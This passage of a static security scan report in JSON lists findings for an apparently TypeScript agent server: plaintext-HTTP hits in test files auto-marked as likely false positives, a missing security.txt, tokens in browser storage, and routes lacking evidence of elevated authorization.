"triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/message-router-cross-machine.test.ts"}, "region": {"startLine": 112}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14229, "scanner": "repobility", "fingerprint": 
"37e2c3416343cff049c6240ae1b7a4dc", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ExecutionJournal.test.ts"}, "region": {"startLine": 516}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14228, "scanner": "repobility", "fingerprint": "991bfd9e25f416e60f80f443a882736e", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ExecutionJournal.test.ts"}, "region": {"startLine": 99}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14227, "scanner": "repobility", "fingerprint": "598620cf3107c4db455e4bdc01464253", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ExecutionJournal.test.ts"}, "region": {"startLine": 87}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for 
sensitive endpoint"}, "properties": {"repobilityId": 14226, "scanner": "repobility", "fingerprint": "96b7189e503aa4f8f6348f983779b624", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/agent-token-manager.test.ts"}, "region": {"startLine": 223}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14225, "scanner": "repobility", "fingerprint": "6b09e46aaa2748cd534a79dfaf15e1e9", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/DiscoverySecurity.test.ts"}, "region": {"startLine": 253}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14224, "scanner": "repobility", "fingerprint": "68bd42fb9037c6ce767f48324d09aac8", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/CoherenceGate.test.ts"}, "region": {"startLine": 
535}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14223, "scanner": "repobility", "fingerprint": "35dd726ace196cb1a1a81b63f9e3f1a4", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/git-sync-transport.test.ts"}, "region": {"startLine": 390}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14222, "scanner": "repobility", "fingerprint": "2cc14ec357fdda88bb96b0d544f2c3ba", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/git-sync-transport.test.ts"}, "region": {"startLine": 381}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14221, "scanner": "repobility", "fingerprint": "80424dda1b85932ed41e736f7475a65d", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": 
[{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/git-sync-transport.test.ts"}, "region": {"startLine": 374}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14220, "scanner": "repobility", "fingerprint": "d2c5bb8ddc0c077cd03205ce0f73d413", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/git-sync-transport.test.ts"}, "region": {"startLine": 368}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14219, "scanner": "repobility", "fingerprint": "4009bc25320265669d0a038148501c98", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/git-sync-transport.test.ts"}, "region": {"startLine": 362}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14218, "scanner": "repobility", "fingerprint": "d71eadbda3c42992f0c627bbe61ec9ec", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", 
"aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/git-sync-transport.test.ts"}, "region": {"startLine": 62}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14217, "scanner": "repobility", "fingerprint": "6d7bd8c8f38466773d199ae76c575184", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/message-router.test.ts"}, "region": {"startLine": 346}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14216, "scanner": "repobility", "fingerprint": "cf03462f21df3d57bf9edcf274866b7a", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/message-router.test.ts"}, "region": {"startLine": 315}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14215, "scanner": "repobility", "fingerprint": "7251cbcd76c8c16d1ecf3b82d55b238c", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, 
"reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/message-router.test.ts"}, "region": {"startLine": 280}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14214, "scanner": "repobility", "fingerprint": "1af20df9fd97f84aa76dbc2dd739dd14", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/messaging-types.test.ts"}, "region": {"startLine": 358}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14213, "scanner": "repobility", "fingerprint": "fbc80850bbbaff034c3d0ee4ab853673", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/threadline/A2AIntegration.test.ts"}, "region": {"startLine": 659}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14212, "scanner": "repobility", "fingerprint": "bb66cd77fcc30f493da75e0e7d8b113c", "category": "crypto", 
"severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/execution-journal-lifecycle.test.ts"}, "region": {"startLine": 210}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14211, "scanner": "repobility", "fingerprint": "d2ecc9ec4e393771e2f187ae792ff549", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/execution-journal-lifecycle.test.ts"}, "region": {"startLine": 177}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14210, "scanner": "repobility", "fingerprint": "c67aaa28483eb43ee26d5a5e573e5aea", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/execution-journal-lifecycle.test.ts"}, "region": {"startLine": 160}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for 
sensitive endpoint"}, "properties": {"repobilityId": 14209, "scanner": "repobility", "fingerprint": "f8c0fe5c8ea5ce1d8ef903b959180b9f", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/execution-journal-lifecycle.test.ts"}, "region": {"startLine": 123}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14208, "scanner": "repobility", "fingerprint": "87f7ac4f4aff3395d817591ea26c0db3", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/messaging-routes.test.ts"}, "region": {"startLine": 393}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14207, "scanner": "repobility", "fingerprint": "d8baa494526b3b50171e4876ebfc2c08", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/messaging-routes.test.ts"}, 
"region": {"startLine": 364}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14206, "scanner": "repobility", "fingerprint": "d8c485e11681de4e924a41e86afdc8b2", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/messaging-routes.test.ts"}, "region": {"startLine": 326}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14205, "scanner": "repobility", "fingerprint": "e65043d720f852d608262d7f3cbfa06d", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/messaging-routes.test.ts"}, "region": {"startLine": 292}}}]}, {"ruleId": "WEB003", "level": "warning", "message": {"text": "Public web service has no security.txt"}, "properties": {"repobilityId": 10614, "scanner": "repobility-web-presence", "fingerprint": "5cd26606c5a53c9f403ff7a92a6917c19cf440a23ce03e2b90e8c493312ef8cd", "category": "quality", "severity": "medium", "confidence": 0.78, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Repository looks like a public web app/API but no security.txt file or route was discovered.", "evidence": {"rule_id": "WEB003", "scanner": 
"repobility-web-presence", "references": ["https://www.rfc-editor.org/rfc/rfc9116", "https://github.com/Lissy93/web-check"], "correlation_key": "fp|5cd26606c5a53c9f403ff7a92a6917c19cf440a23ce03e2b90e8c493312ef8cd"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": ".well-known/security.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "JRN003", "level": "warning", "message": {"text": "Frontend API reference is not matched by discovered backend routes"}, "properties": {"repobilityId": 10613, "scanner": "repobility-journey-contract", "fingerprint": "8acdb81a55841a608a3e742b3a69d764426d96bb1350974d06e6724b2cb08efb", "category": "quality", "severity": "medium", "confidence": 0.74, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Same-origin /api path appears in frontend code but no discovered backend endpoint has the same route shape.", "evidence": {"rule_id": "JRN003", "scanner": "repobility-journey-contract", "references": ["https://repobility.com/library/authorization/"], "route_shape": "/api/files", "correlation_key": "fp|8acdb81a55841a608a3e742b3a69d764426d96bb1350974d06e6724b2cb08efb", "backend_endpoint_count": 489}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/PostUpdateMigrator.ts"}, "region": {"startLine": 1604}}}]}, {"ruleId": "JRN002", "level": "warning", "message": {"text": "Browser storage is used for session token material"}, "properties": {"repobilityId": 10612, "scanner": "repobility-journey-contract", "fingerprint": "25b4253f0e32af792d7781bd0be7599e7eca26015ab0ea0725a47d3b3112980d", "category": "auth", "severity": "medium", "confidence": 0.82, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Storage API call references token-like key or value names.", "evidence": {"rule_id": "JRN002", "scanner": "repobility-journey-contract", "references": ["https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html"], "correlation_key": 
"code|auth|dashboard/index.html|3325|jrn002"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/index.html"}, "region": {"startLine": 3325}}}]}, {"ruleId": "JRN002", "level": "warning", "message": {"text": "Browser storage is used for session token material"}, "properties": {"repobilityId": 10611, "scanner": "repobility-journey-contract", "fingerprint": "7d3bdeb3baf601926f8beb9d82632cf761ddc57d77488954e2147dc4a52edcb5", "category": "auth", "severity": "medium", "confidence": 0.82, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Storage API call references token-like key or value names.", "evidence": {"rule_id": "JRN002", "scanner": "repobility-journey-contract", "references": ["https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html"], "correlation_key": "code|auth|dashboard/index.html|3305|jrn002"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/index.html"}, "region": {"startLine": 3305}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. 
Endpoint: DELETE /semantic/forget/:id."}, "properties": {"repobilityId": 10610, "scanner": "repobility-access-control", "fingerprint": "e48ce4fce10392d514a2a9e3598867d5272c8e84509fb45112d187a6645102a2", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/semantic/forget/:id", "method": "DELETE", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2403|cwe-285", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2403}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. 
Endpoint: POST /backups/:id/restore."}, "properties": {"repobilityId": 10609, "scanner": "repobility-access-control", "fingerprint": "9f3b6510d2ff0c58622d93b00b4b2381c39b6855623b5cc9f6195b2415b2a3f9", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/backups/:id/restore", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2157|cwe-285", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2157}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. 
Endpoint: PUT /homeostasis/thresholds."}, "properties": {"repobilityId": 10608, "scanner": "repobility-access-control", "fingerprint": "1dae21f1b27d8d3344b62da399f433a1a8cb1de35c217d35b9384e342054e33c", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/homeostasis/thresholds", "method": "PUT", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2011|cwe-285", "identity_targets": ["authenticated"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2011}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. 
Endpoint: POST /homeostasis/reset."}, "properties": {"repobilityId": 10607, "scanner": "repobility-access-control", "fingerprint": "8232341477e3d32f3a6a0e9bc47f7947ac062e525338d98eeb63632ab3c6b09a", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/homeostasis/reset", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2006|cwe-285", "identity_targets": ["authenticated"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2006}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. 
Endpoint: POST /homeostasis/pause."}, "properties": {"repobilityId": 10606, "scanner": "repobility-access-control", "fingerprint": "b7b36403c8b6f84554a8b2ddf40ca1ac0042a927cce8ac9c9a64221c8315865d", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/homeostasis/pause", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2000|cwe-285", "identity_targets": ["unknown"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2000}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. 
Endpoint: POST /reflection/session-start."}, "properties": {"repobilityId": 10605, "scanner": "repobility-access-control", "fingerprint": "99b6452863344e83efe88ba48a2efffd846c0e15c982889db827ae846caba0df", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/reflection/session-start", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|1967|cwe-285", "identity_targets": ["authenticated"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 1967}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. 
Endpoint: POST /api/handoff/request."}, "properties": {"repobilityId": 10604, "scanner": "repobility-access-control", "fingerprint": "e80f72712877a3de9e609ed59d274b6185ffa2382f2fdacba472e89b33716c72", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/api/handoff/request", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/machineroutes.ts|150|cwe-285", "identity_targets": ["unknown"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/machineRoutes.ts"}, "region": {"startLine": 150}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. 
Endpoint: POST /dashboard/unlock."}, "properties": {"repobilityId": 10603, "scanner": "repobility-access-control", "fingerprint": "9189059f6a2b9f01626c257ddc7058f45a762cd3884216189193d681c9f01250", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/dashboard/unlock", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/agentserver.ts|223|cwe-285", "identity_targets": ["unknown"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/AgentServer.ts"}, "region": {"startLine": 223}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. 
Endpoint: GET /dashboard."}, "properties": {"repobilityId": 10602, "scanner": "repobility-access-control", "fingerprint": "47b50b45f1f23d234f8aeb4bb79320c52c2a6dd90ba8adef54bd0efaf4817cb1", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/dashboard", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/agentserver.ts|207|cwe-285", "identity_targets": ["unknown"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/AgentServer.ts"}, "region": {"startLine": 207}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. 
Endpoint: POST /moltbridge/profile/approve."}, "properties": {"repobilityId": 10601, "scanner": "repobility-access-control", "fingerprint": "5440235bc0afc8b170bbbd7e6259a9013f64a61a811cae85685d3fc347f3f8eb", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/moltbridge/profile/approve", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/moltbridge/routes.ts|178|cwe-285", "identity_targets": ["unknown"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/moltbridge/routes.ts"}, "region": {"startLine": 178}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. 
